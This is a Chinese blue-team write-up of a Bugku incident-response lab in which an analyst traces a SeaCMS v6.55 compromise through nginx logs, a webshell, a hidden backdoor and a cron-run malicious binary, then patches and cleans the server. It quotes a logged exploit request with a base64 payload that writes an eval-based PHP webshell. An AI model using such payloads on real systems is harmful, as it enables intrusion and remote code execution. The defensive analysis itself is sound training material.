蓝队HW 实战应急响应-案例

admin 2024年7月1日22:39:15评论6 views字数 2457阅读8分11秒阅读模式

蓝队HW和日常实战迎接响应

题目:

X集团的WebServer服务器遭到黑客入侵,该服务器的Web应用系统被上传恶意软件,系统文件被恶意软件破坏,您的团队需要帮助该公司追踪此网络攻击的来源,在服务器上进行全面的检查,包括日志信息、进程信息、系统文件和恶意文件等。通过分析黑客的攻击行为,我们将发现系统中的漏洞,并对其进行修复。

蓝队HW 实战应急响应-案例

蓝队HW 实战应急响应-案例

蓝队HW 实战应急响应-案例

开启靶场:

蓝队HW 实战应急响应-案例

开始实验:

使用Xshell登录服务器,账号及密码如上图。

蓝队HW 实战应急响应-案例

1、提交攻击者的IP地址

WP:

找到服务器日志路径,通常是在/var/log/,使用cd /var/log/,ls查看此路径下的文件.

找到nginx文件夹。

蓝队HW 实战应急响应-案例

进入nginx文件夹,找到access.log文件。

蓝队HW 实战应急响应-案例

下载access.log到本地电脑,使用Notepad++打开。

蓝队HW 实战应急响应-案例

发现38.207.130.14这个IP地址对多个页面发送HEAD请求,而且根据404后面的DirBuster-1.0-RC1 可得到是一个目录扫描工具,由此可得出攻击IP为38.207.130.14。提交成功!

2、提交攻击者目录扫描所使用的工具名称

通过第一题,得到扫描工具是DirBuster-1.0-RC1,根据题目提示工具名称要用小写,经过提交测试发现,提交的时候不需要带版本,只提交dirbuster就可以提交成功。

蓝队HW 实战应急响应-案例

3、提交攻击者首次攻击成功的时间

继续查看access.log,发现了一些a.php上传请求,有可能是上传的木马文件,那"POST /a.php HTTP/1.1" 上面一条"POST /search.php?eval(base64_decode('ZmlsZV9wdXRfY29udGVudHMoJ2EucGhwJywnPD9waHAgZXZhbCgkX1BPU1RbMV0pOyA/PicpOw==')); HTTP/1.1"就是上传木马操作。

蓝队HW 实战应急响应-案例

根据日志显示这个POST上传请求是使用base64编码的,那么我们使用Base64编码解码工具进行解码,根据解码内容可知确实是上传木马的操作。那么上传日期就是这个日志的操作时间,

蓝队HW 实战应急响应-案例

蓝队HW 实战应急响应-案例

题目要求格式为:DD/MM/YY:HH:MM:SS(例如31/01/2000:01:02:03),对攻击成功日期进行格式转换,转换后03/11/2023:15:03:35提交成功。

4、找到攻击者写入的恶意后门文件

提交文件名(完整路径)

根据前面我们知道a.php是上传的木马,也就是攻击者写入的恶意后门文件,那就可以查找a.php所在的完整路径。

find / -name a.php

蓝队HW 实战应急响应-案例

得到完整路径为:/var/www/html/a.php,提交成功。

5、找到攻击者写入的恶意后门文件密码

我们知道恶意后门文件是a.php,上一题也知道路径,那么进入a.php文件所在的路径

cd /var/www/html/

ls查看文件,找到a.php文件,使用vi命令查看文件内容

蓝队HW 实战应急响应-案例

蓝队HW 实战应急响应-案例

方括号里面的“1”即为密码,提交成功。

6、找到攻击者隐藏在正常web应用代码中的恶意代码

提交该文件名(完整路径)

通过查看/var/www/html/下的文件,找了好长时间,发现/var/www/html/include/webscan/360webscan.php文件的这些代码很奇怪,通过搜索的出是隐蔽的后门木马。

蓝队HW 实战应急响应-案例

蓝队HW 实战应急响应-案例

蓝队HW 实战应急响应-案例

那么/var/www/html/include/webscan/360webscan.php就是恶意代码的完整路径,提交成功。

7、识别系统中存在的恶意程序进程

提交文件名(完整路径)

首先使用“ps -aux”命令查进程,查出来的进程比较多,也不能判断那个是恶意进程。

蓝队HW 实战应急响应-案例

既然是恶意进程,那就有计划任务,我们再查下计划任务。

  1. cd /var/spool/cron
  2. ls
  3. vi www-data

蓝队HW 实战应急响应-案例

蓝队HW 实战应急响应-案例

发现只有一个计划任务,路径是/var/crash/php-fpm,提交成功。

8、识别系统中存在的恶意程序进程2

提交C&C服务器IP地址和端口(格式:1.1.1.1:22)

蓝队HW 实战应急响应-案例

蓝队HW 实战应急响应-案例

9、修复网站漏洞

进入网站目录,查看网站主页,index.php。

  1. cd /var/www/html
  2. ls

蓝队HW 实战应急响应-案例

访问网站,http://47.103.131.47/index.php,网页下拉到底,可知为海洋CMS。

蓝队HW 实战应急响应-案例

查看海洋CMS的版本

  1. cd /var/www/html/data/admin
  2. ls

蓝队HW 实战应急响应-案例

找到ver.txt,是存放版本号的文件

vi ver.txt

蓝队HW 实战应急响应-案例

得到海洋CMS的版本为v6.55

查询海洋CMS v6.55漏洞

蓝队HW 实战应急响应-案例

漏洞分析:官方给出的修复是在parseIf函数里面加了黑名单。但是没有做SERVER变量的过滤,所以可以用SERVER变量的性质来达到写入命令。

修复方法1

修改/var/www/html/include/main.class.php文件里面的parseIf函数,补充黑名单增加_SERVER,保存后点击check,提交成功。

蓝队HW 实战应急响应-案例

蓝队HW 实战应急响应-案例

修复方法2

修改/var/www/html下的search.php文件;

蓝队HW 实战应急响应-案例

在echoSearchPage()函数中增加一条过滤语句:if(strpos($searchword,'{searchpage:')) exit;

蓝队HW 实战应急响应-案例

10、 删除恶意程序、文件、代码

删除/var/www/html路径下的a.php

rm a.php

蓝队HW 实战应急响应-案例

删除/var/crash/路径下的

rm php-fpm

蓝队HW 实战应急响应-案例

删除/var/www/html/include/webscan/360webscan.php里面的木马内容,记住不要删除整个文件,要不然系统会提示修复失败。

蓝队HW 实战应急响应-案例

还有删除php-fpm的计划任务

  1. cd /var/spool/cron/crontabs/
  2. ls
  3. vi www-data

删除红圈里的内容,:wq!保存。

蓝队HW 实战应急响应-案例

删除后

蓝队HW 实战应急响应-案例

checking完成,提交成功。

题目来源:

bugku 网络安全事件应急响应https://buuoj.cn/challenges

原文:

https://blog.csdn.net/qq274575499/article/details/139140263QYpiying

蓝队HW 实战应急响应-案例

原文始发于微信公众号(Hacking黑白红):蓝队HW 实战应急响应-案例

  • 左青龙
  • 微信扫一扫
  • weinxin
  • 右白虎
  • 微信扫一扫
  • weinxin
admin
  • 本文由 发表于 2024年7月1日22:39:15
  • 转载请保留本文链接(CN-SEC中文网:感谢原作者辛苦付出):
                   蓝队HW 实战应急响应-案例http://cn-sec.com/archives/2906885.html

发表评论

匿名网友 填写信息